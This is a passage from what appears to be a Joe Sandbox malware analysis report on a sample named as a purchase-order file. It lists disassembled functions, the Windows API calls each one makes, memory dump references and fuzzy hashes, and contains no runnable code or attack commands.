                                                                      • Instruction Fuzzy Hash: 9DE08632644121AAD32097749E0493B72ACAA84751302093EF506F2180D7389C21A669
                                                                      Function 0040597F Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe,80000000,00000003), ref: 00405983
                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                      • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                      • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                      • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                      Function 00405468 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,004030DF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 0040546E
                                                                      • GetLastError.KERNEL32 ref: 0040547C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1375471231-0
                                                                      • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                      • Instruction ID: c55d8aa437131a95a01de78b0052dcd3d9cc3f447ee629d771dafcce0f52932c
                                                                      • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                      • Instruction Fuzzy Hash: F5C04C30719601EAD6205B609E08B5B7D54AB54742F1045756546E10F0D6749451D92E
                                                                      Function 100027E8 Relevance: 2.7, APIs: 2, Instructions: 156memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 100028A7
                                                                      • GetLastError.KERNEL32 ref: 100029AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: AllocErrorLastVirtual
                                                                      • String ID:
                                                                      • API String ID: 497505419-0
                                                                      • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                      • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                      • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                      • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                      Function 0040255C Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: wsprintf
                                                                      • String ID:
                                                                      • API String ID: 2111968516-0
                                                                      • Opcode ID: 2b3f0152387d06df6eaf096f135fad1e6c25d68e51a67a505a4e16ce5121cf03
                                                                      • Instruction ID: 2ad6ade0dd87bb00519d913a8aa863536615c58d60cd2f1651ee4e1b5922b607
                                                                      • Opcode Fuzzy Hash: 2b3f0152387d06df6eaf096f135fad1e6c25d68e51a67a505a4e16ce5121cf03
                                                                      • Instruction Fuzzy Hash: D321DB70C04295BEDF318B584A985AF7B749B11314F1484BBE891B62D1C1BD8A85EB1D
                                                                      Function 00402616 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630
                                                                        • Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointerwsprintf
                                                                      • String ID:
                                                                      • API String ID: 327478801-0
                                                                      • Opcode ID: 605c8d6a649ef785eb1d6a94470a00a99215b591ffdd9e56fcea621c1e02c6b1
                                                                      • Instruction ID: 8aac78d75a064c4630454a8a93e19dff4664e4603579630d9101515f905a40da
                                                                      • Opcode Fuzzy Hash: 605c8d6a649ef785eb1d6a94470a00a99215b591ffdd9e56fcea621c1e02c6b1
                                                                      • Instruction Fuzzy Hash: 56E01A76A05640AAE701B7A5AE89CBE636ADB50318B20853BF601B00C1C6BD89059A3E
                                                                      Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExA.KERNELBASE(00000000,000002DB,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: eded891075ee9d68bdfa7caca34f4ecd2b61e9434e1da65918f8acfe225afcc1
                                                                      • Instruction ID: f02d1f32d416435064830634415e16150983832f9e15cf27d1a8645227483e3a
                                                                      • Opcode Fuzzy Hash: eded891075ee9d68bdfa7caca34f4ecd2b61e9434e1da65918f8acfe225afcc1
                                                                      • Instruction Fuzzy Hash: 6EE0E676250108BFD700DFA9DD47FD577ECE758745F008421B609D7095C774E5508B69
                                                                      Function 00405A26 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403057,00000000,007890F8,000000FF,007890F8,000000FF,000000FF,00000004,00000000), ref: 00405A3A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                      • Instruction ID: 202e9d0092b88ed1e300126467a6d0629c49e9ab1c26cc5f9aac99f6baf52130
                                                                      • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                      • Instruction Fuzzy Hash: FFE0EC3261425AAFDF10AEA59C44EEB7B6CFB05360F008533F915E2550D231E921DFA9
                                                                      Function 004059F7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030A1,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A0B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                      • Instruction ID: ec62d6923e01247a1983afaeae7cc56c043784b3a51a97a909eefe23b1c45cc9
                                                                      • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                      • Instruction Fuzzy Hash: CFE04F32210259AFCF10AE549C40EAB375CEB04250F004432F915E2040D230E8119FA8
                                                                      Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                      • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                      • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                      • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                      Function 004022C7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileString
                                                                      • String ID:
                                                                      • API String ID: 1096422788-0
                                                                      • Opcode ID: 89032baceb3f6f114b0488ce247a90a0ba58f85f764d13967e355b5ac32f42df
                                                                      • Instruction ID: 39f1f9859769fa242ff58571ca275c021542d1dfaf63d46caa25723865460d27
                                                                      • Opcode Fuzzy Hash: 89032baceb3f6f114b0488ce247a90a0ba58f85f764d13967e355b5ac32f42df
                                                                      • Instruction Fuzzy Hash: 66E08630A04214BFDB20EFA08D09BAE3669BF11714F10403AF9917B0D2EAB849419B1D
                                                                      Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 0ea397a8211670639f436dd097bf0c7cb6117b14819b8f8d67c2300def58ed07
                                                                      • Instruction ID: 839d6edb89fd0a39869f3bdff0d3b393134e6f043e5016f1e00bd5f534211bce
                                                                      • Opcode Fuzzy Hash: 0ea397a8211670639f436dd097bf0c7cb6117b14819b8f8d67c2300def58ed07
                                                                      • Instruction Fuzzy Hash: 34D05B33B14110DBDB40EBE4DB08A9D73A5BB60329B308637D201F21D1D7BDC9549B29
                                                                      Function 00403F3D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageA.USER32(00010426,00000000,00000000,00000000), ref: 00403F4F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: fe9c5fbe97cae241cde84ce22785a5e9dbc0b02d0b9d793388d9d8a90b417260
                                                                      • Instruction ID: 9b9c13dac3056517ae90cab9ba0900707a7cdbddb9b58ac83e38e750941f619c
                                                                      • Opcode Fuzzy Hash: fe9c5fbe97cae241cde84ce22785a5e9dbc0b02d0b9d793388d9d8a90b417260
                                                                      • Instruction Fuzzy Hash: 39C04C71A442016AEB219B649D49F067BA8A751701F1594257315A50E0D674E410D66D
                                                                      Function 00403F26 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
